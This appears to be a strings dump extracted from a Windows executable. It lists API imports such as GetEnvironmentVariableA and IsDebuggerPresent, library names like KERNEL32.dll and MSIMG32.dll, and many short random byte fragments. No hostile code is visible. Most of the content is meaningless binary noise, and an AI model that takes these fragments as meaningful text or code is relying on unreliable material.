GetCalendarInfoA
GetCurrentProcess
GetEnvironmentVariableA
GetLocaleInfoA
GetModuleHandleA
GetThreadLocale
ghAd h
g"hx\:"hm
GKb	%.
gKR:qND&
g,U!Pjb
?g}x -iL
GxJ>x!Z
h0h\Rh9L
h1BhgbhT
h1M@hS
h2.dlU
h2hm~o
H3`hBh
h3]oPh
h5@h/el
h^5k h
h%*5mU
h6AH{kd
h7Bht h
h7"h#=
"h/Bh?7I
hBhF#|
hbhWjv+
hbhzF"h
h	]:(c
hc1]9H
"hdABh#phrh
hDjRh"h<
h\Dm2h
hD}M}6
HeapAlloc
HeapDestroy
Hf;rbL
hfyGk"h
|}@h?F}z
hGEa h=
hGo-vT
"h=[`h
h@h<16
h@h6>A
h(hbhFbhd
h> h@h3
h@h hph2h
h@h@hSD
hhN hS
h@hO9ph
h$-hph
h@h\rh
^`h$I8
hIdjrh
h+#IS^
hisljlw
@hJ{k&
hj:&W:l`h
hL\0h_
hL/Yy^FN
hn0h6RhI
hn!%]@T
h(OX3S?
hPh0hPh
 hPh/8x
hph-Cc&
hpheBh
h-.Phl
"hq[31
"hRh9h
h	,RhAak
h>rh[`h
hrh.j/[
"hRh;jK|
H#Rhph
hrh]Rh
hrh<ZQ!
hS1)Rh*3
hTk> hQ
h>T=m9
h+Tq2h
htX]ph
h[)	Uv
hvBh9*
hVdCE\
hW`h/,o{s
 hX&bh
;:@hX=c
h-XPhY
h*/~xV
hXY|	K
@h-[ybh
h*Yrhbh\
"h?z3Bh|V
h\Z h9Jg
I'3"hrhQ
IBhEphZ~
InterlockedExchange
IsDebuggerPresent
;I+][v
j1e6>5
j\4'C]
JBhz@h
jE31Ph
}jFxc|
JKI6qi
-JR&[)
JRhsE%2h
;*]k~)
K|}2;s^(
^k}9^@h<
KERNEL32.dll
Kg}$E]TI
k%''JH
ko!^sc
KY<E <
\]l0>b
L0hET]
*l\4e*c
~l8P=9N
L+]b4e
l@hH"h
=.LnC<
lstrlenA
lstrlenW
m?"HGJA
m:l1;J-
m N#}E
(MO#{Q
MSIMG32.dll
mt6wZYU
MultiByteToWideChar
(Mw`hJ@h
mWzTN h
Myyu0V
N4}/qGCu
)n6}%tq
nBh+<x	
n@hGph
N~|I)S$
nKbdeU
nKwh_I
NM>Bh|
NnSIFr
No3Ex1oR
<n,Q7w
n|_W/4
]nZ62 
o,7@HU
O7S3	1
o-9"hy
&(O9x1
OBlcn0
OC"b$$
oc"hFN
O[F3VXv
Og/GV&<CH1
O#]:h!#
o&"hON
ohs:s+P
ole32.dll
oM`hPhS
o~	Np`
os,OlC
oy3y0Z
p^Cz\W^
P,Dq[z<HCY
ph0hRh
PhbhI!
PhC5"h
phdph;l
PhK(dZ(
phrh)9TF
phyPhX
p:J|4$e2
PPPPPP
ProgIDFromCLSID
^~=Q0Q
q2aE]/
q2h@hI
;Q4gfqV
qb)r;C1
QCe0h2h
QFHrl(
=!q<L]
qm&NFm
q?|#Rh
r95TXB
RaiseException
.reloc
rh'drh
rh hho)
rh`hK6
rh	"hxj
rhJ1?i
rhkZl5
Rhl{,2h
RhNZ hc
rhphPh"h
rhphWgRhx
%'RsKI
rU9rz\
SetUnhandledExceptionFilter
sHES2h
sob62U
sQp#69
StringFromCLSID
SXhAkY[
sZsXwN,
SZzRhx
t3 F_(
t3^=@h
=t45Z$
t[5;5W
,$T5O'
TD M3=
TerminateProcess
T h0hy
!This program cannot be run in DOS mode.
tItIV[
tLmZS@
t)n	^Dah
"]]TQ9mZO
TransparentBlt
T,u0hL
tUvL[D
;tw!aB
:t$:	Y
u	3}qH
U6"h0h
$&U^#a
u	C]4(
u.CiyR0
uGGjf	_
U`hI(m
Ui1C@h
u%	k'#Jw
UnhandledExceptionFilter
uPh92hph$
#Uph(V=[Ph
-,Urh?
'V'{+-
V0r_='
V1Ghhph3[}
(#vE&B
V@hn9.
VS0p%A
vx@r55
VXyMPh]%|
&#:.|w
\w8`hii/]
=Wa\JF
wc8Old
wGN	>|
W"h\Bh
w#H-Ey
WideCharToMultiByte
WKD$\j
Wm}cOK
W{}%,V
WW#Eg*^
WZDBhiX
XARhRh
X[BhN5,
XG!uRh
>$x@hF
x$ h h<
[Xk"h(
x{O/Q>E
xpE_gL
,/XrI<
X`\$RM`
Xr;o*-
x'xn-t
X-z,ph
{y2hvd
y%cjRhJ
yhi(:	^
Yn30#4SX
YN;vuQH
 y,{uw5	
Yw*u h
/Z^4rh
Z)|d&p#
ze&U$rhs
_zfrhY
zg?s7N
Z\l_\&
,z,Ojt
zS%EwS